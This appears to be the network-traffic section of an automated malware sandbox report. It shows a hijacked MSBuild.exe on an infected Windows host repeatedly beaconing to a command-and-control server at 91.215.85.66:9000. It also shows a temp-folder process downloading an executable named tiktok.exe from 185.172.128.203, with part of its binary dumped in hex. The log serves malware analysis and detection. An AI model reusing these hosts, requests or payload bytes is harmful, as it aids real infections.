Apr 27, 2024 00:47:05.445022106 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:05.649780035 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:04 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49780	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:06.647553921 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:06.859267950 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:06 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49781	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:07.581929922 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:07.793087006 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:07 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49784	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:08.115566969 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:08.871839046 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:08 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49785	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:09.886888981 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:10.096432924 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:09 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49786	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:10.459033966 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:10.664927006 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:09 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49787	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:10.987459898 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:11.379431963 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:11 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49788	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:11.699632883 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:11.905117989 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:11 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49789	185.172.128.203	80	416	C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:11.896996975 CEST	76	OUT	GET /tiktok.exe HTTP/1.1 Host: 185.172.128.203 Cache-Control: no-cache
Apr 27, 2024 00:47:12.069015026 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 22:47:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT ETag: "85400-616de2c892480" Accept-Ranges: bytes Content-Length: 545792 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B [TRUNCATED]
Apr 27, 2024 00:47:12.069102049 CEST	1289	IN	Data Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45 Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
Apr 27, 2024 00:47:12.069144011 CEST	1289	IN	Data Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58 Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
Apr 27, 2024 00:47:12.069219112 CEST	1289	IN	Data Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3 Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
Apr 27, 2024 00:47:12.069513083 CEST	1289	IN	Data Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52 Data Ascii: APb2\|$vWGD$@PjGt=\|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$\|$8D$$D$4CD$$GhG6'@'@#(@(@)@)@
Apr 27, 2024 00:47:12.069735050 CEST	1289	IN	Data Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00 Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
Apr 27, 2024 00:47:12.239298105 CEST	1289	IN	Data Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF
Apr 27, 2024 00:47:12.239310980 CEST	1289	IN	Data Raw: da 74 e5 8b 70 04 2b f2 56 52 53 e8 59 48 05 00 8b 4d f8 8d 04 1e 83 c4 0c 89 41 04 8b 45 0c 89 07 eb c7 cc cc cc cc cc cc 55 8b ec 51 53 8b 5d 08 56 57 8b f9 85 db 75 04 33 f6 eb 40 81 fb ff ff ff 1f 0f 87 80 00 00 00 8d 04 dd 00 00 00 00 3d 00 Data Ascii: tp+VRSYHMAEUQS]VWu3@=rH#;vpQ\;p#FPH;O+QRVGG+EtG+PQ:GEG7_^[]HCUSVuCC
Apr 27, 2024 00:47:12.239361048 CEST	1289	IN	Data Raw: 46 04 8b 40 0c 89 48 10 8b 46 04 5f 89 48 0c 89 4e 04 5e 5b 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 51 56 6a 18 8b f1 e8 89 36 05 00 8b d0 0f 57 c0 8b 45 08 83 c4 04 89 55 fc 0f 11 02 66 0f d6 42 10 c7 42 10 00 00 00 00 c7 42 04 0d 00 00 00 Data Ascii: F@HF_HN^[]UQVj6WEUfBBBBBxGBFBF@tBF@PFPV^]U$lG3ES]VqMEW;ve9W3fEt0yt++
Apr 27, 2024 00:47:12.239455938 CEST	1289	IN	Data Raw: 57 c0 50 8b ce 66 0f d6 45 f0 e8 18 ff ff ff 01 7e 0c 8b ce 8b 06 89 45 e8 8d 45 e0 50 c7 45 ec 00 00 00 00 e8 fe fe ff ff 53 8d 4d e8 8b 38 8b 70 04 8d 45 d8 50 e8 3c fc ff ff 56 57 ff 75 f4 c6 45 ec 00 8d 4d f0 ff 75 f0 ff 70 04 ff 30 ff 75 ec Data Ascii: WPfE~EEPESM8pEP<VWuEMup0u2M_^3[0/]hvG UVW}WfGyvGu+1uy't!+w_^]w_^]
Apr 27, 2024 00:47:12.239471912 CEST	1289	IN	Data Raw: 74 16 80 fa 29 74 11 f6 c1 10 75 0e 8a 08 80 f9 7b 74 05 80 f9 7d 75 02 89 06 ff 06 8b ce e8 db f2 ff ff e9 e0 00 00 00 83 f8 28 75 67 8b ce e8 0a fe ff ff 8b ce e8 13 0e 00 00 83 7e 4c 29 8a d8 0f 85 da 00 00 00 8b 06 8b 4e 08 3b c1 74 33 80 38 Data Ascii: t)tu{t}u(ug~L)N;t38\u,@;t'NPu(t)tu{t}ut}t^ujN$[c$ujN$C\|K*tm+th?tc{t^}uFPtI]uFPt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49790	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:12.228606939 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:12.559196949 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:12 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49791	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:13.241405010 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:13.728532076 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:13 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49792	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:14.429697990 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:14.925092936 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:14 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49793	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:15.257375002 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:15.461215973 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:14 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49794	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:15.786232948 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:16.061913013 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:15 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49795	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:16.379276991 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:16.594424009 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:15 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49796	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:16.908272982 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:17.216211081 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:17 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49797	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:17.525235891 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:17.860909939 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:17 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49798	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:18.178621054 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:18.478177071 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:18 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49800	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:21.801070929 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:22.008495092 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:21 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49802	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:22.347841978 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:22.557924032 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:22 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49803	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:22.871599913 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:23.076033115 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:22 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49804	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:23.486223936 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:23.710853100 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:23 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49805	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:24.345956087 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:24.553845882 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:23 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49806	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:24.868469954 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:25.411164045 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:24 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49807	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:27.025723934 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:27.236500025 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:26 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49808	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:27.560591936 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:27.774173021 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:26 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49809	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:28.122807980 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
